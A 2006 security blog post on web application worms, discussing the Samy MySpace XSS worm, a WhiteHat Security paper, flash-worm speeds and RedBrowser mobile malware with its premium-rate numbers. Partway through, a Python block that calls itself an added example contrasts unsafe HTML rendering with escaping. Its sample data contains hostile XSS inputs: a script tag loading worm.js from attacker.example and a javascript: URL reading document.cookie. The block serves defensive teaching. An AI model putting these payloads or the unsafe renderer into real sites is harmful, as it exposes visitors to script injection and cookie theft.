Thursday, May 04, 2006

The Current State of Web Application Worms

Remember the most recent Yahoo! Mail XSS vulnerabilities, or the MySpace worm? I just read through a well-written summary on web application worms by Jeremiah Grossman of WhiteHat Security, "Cross-Site Scripting Worms and Viruses - The Impending Threat and the Best Defense". An excerpt:

"Samy, the author of the worm, was on a mission to be famous, and as such the payload was relatively benign. But consider what he might have done with control of over one million Web browsers and the gigabits of bandwidth at their disposal--browsers that were also potentially logged-in to Google, Yahoo, Microsoft Passport, eBay, web banks, stock brokerages, blogs, message boards, or any other web-based applications. It’s critical that we begin to understand the magnitude of the risk associated with XSS malware and the ways that companies can defend themselves and their users. Especially when the malware originates from trusted websites and aggressive authors. In this white paper we will provide an overview of XSS; define XSS worms; and examine propagation methods, infection rates, and potential impact. Most importantly, we will outline immediate steps enterprises can take to defend their websites."

It provides an overview of Cross-Site Scripting (XSS) and methods of propagation, comments on the first XSS worm, a worst-case scenario, and of course protection methods, along with nice graphs and an overview of this emerging trend. In my "Future Trends of Malware" research I had already pointed out its emergence:
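A minimal illustration of the defensive point above, added here as an example that is not code from the post or from the WhiteHat paper: user-supplied profile fields rendered raw (the stored-XSS channel a worm such as Samy rides on) beside a hardened renderer that escapes text and allowlists link schemes. The field names and the sample profile are constructed for illustration.

```python
"""Stored-XSS defence for user-supplied profile content (added example)."""
import html
from urllib.parse import urlsplit

ALLOWED_URL_SCHEMES = ("http", "https")


def safe_url(candidate: str) -> str:
    """Return the URL only if its scheme is http(s); otherwise a harmless '#'.

    Allowlisting the scheme (rather than blocklisting 'javascript:') means
    encoded or oddly-cased scheme tricks are rejected by construction.
    """
    cleaned = candidate.strip()
    parts = urlsplit(cleaned)
    if parts.scheme.lower() not in ALLOWED_URL_SCHEMES or not parts.netloc:
        return "#"
    return html.escape(cleaned, quote=True)


def render_profile_unsafe(profile: dict) -> str:
    """The vulnerable pattern: raw user data concatenated into HTML.

    Anything a user stores here runs in every visitor's browser, which is
    exactly the propagation channel a stored-XSS worm needs.
    """
    return (f'<h1>{profile["name"]}</h1>'
            f'<p>{profile["about"]}</p>'
            f'<a href="{profile["homepage"]}">home</a>')


def render_profile_safe(profile: dict) -> str:
    """Hardened form: HTML-escape text and attribute values, allowlist URLs."""
    return (f'<h1>{html.escape(profile["name"])}</h1>'
            f'<p>{html.escape(profile["about"])}</p>'
            f'<a href="{safe_url(profile["homepage"])}">home</a>')


# Constructed sample: a profile whose fields carry markup and a script URL.
SAMPLE_PROFILE = {
    "name": "samy <b>says hi</b>",
    "about": '<script src="http://attacker.example/worm.js"></script>',
    "homepage": "javascript:alert(document.cookie)",
}

if __name__ == "__main__":
    print(render_profile_unsafe(SAMPLE_PROFILE))  # markup survives: vulnerable
    print(render_profile_safe(SAMPLE_PROFILE))    # markup neutralised: safe
```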

"How would a malware author be able to harness the power of the trust established between, let’s say, ComScore’s top 10 sites and their visitors? Content spoofing is where the danger comes from in my opinion, and obvious web application vulnerabilities, or any bugs whose malicious payload could be exposed to their audiences. In case you reckon, a nasty content spoofing on Yahoo!’s portal resulted in the following possibility for driving millions of people at a certain URL, if I don’t trust what I see on Yahoo.com or Google.com, why bother using the Net at all is a common mass attitude of course. Any web property attracting a relatively large number of visitors should be considered as a propagation vector, for both malware authors and others such as phishers, or botnet brokers for instance."

Monetizing mobile malware is among the other trends I also indicated, and RedBrowser seems to be the most recent example of this: it randomly chooses a premium-rate number from the following list and sends an SMS message that generates revenue for the attacker: 08293538938, 08001738938, 08180238938, 08229238938, 08441238938, 08287038938, 08187938938, 08189038938, 08217838938, 08446838938.

I summarized the key points back then as:

"The number and penetration of mobile devices greatly outpaces that of the PCs. Malware authors are actively experimenting and of course, progressing with their research on mobile malware. The growing monetization of mobile devices, that is generating revenues out of users and their veto power on certain occasions, would result in more development in this area by malicious authors. SPIM would also emerge with authors adapting their malware for gathering numbers. Mobile malware is also starting to carry malicious payload. Building awareness on the issue, given the research already done by several vendors, would be a wise idea."

Among the first to discuss the topic of web application malware was Robert from CGISecurity.com in his "Anatomy of Web Application Worm" paper back in 2002, and with the ease and speed of discovering web application vulnerabilities in major portals, it's up to the imagination of the attacker. As the paper points out, Samy only wanted to make 1 million friends; what if he wanted to do something else?

"Cross-Site Scripting Worms and Viruses - The Impending Threat and the Best Defense" also argues that Samy was the fastest worm, though consider single-packet UDP worms: according to research on the "Top Speed of Flash Worm", "Simulating a flash version of Slammer, calibrated by current Internet latency measurements and observed worm packet delivery rates, we show that a worm could saturate 95% of one million vulnerable hosts on the Internet in 510 milliseconds. A similar worm using a TCP based service could 95% saturate in 1.3 seconds. The speeds above are achieved with flat infection trees and packets sent at line rates."

Is it the speed or the size of the infected target group that matters, and what if Web 2.0 worms can achieve both?

More resources on the topic, in case you are interested:
Web-based Malware & Honeypots - phpBB bots/worms
New MySpace XSS worm circulating
Description of a Yahoo! Mail XSS vulnerability
Evolution of Web-based worms
The Latest in Internet Attacks: Web Application Worms
Web Application Worms : Myth or Reality?
Analysis of Web Application Worms and Viruses
Paros - for web application security assessment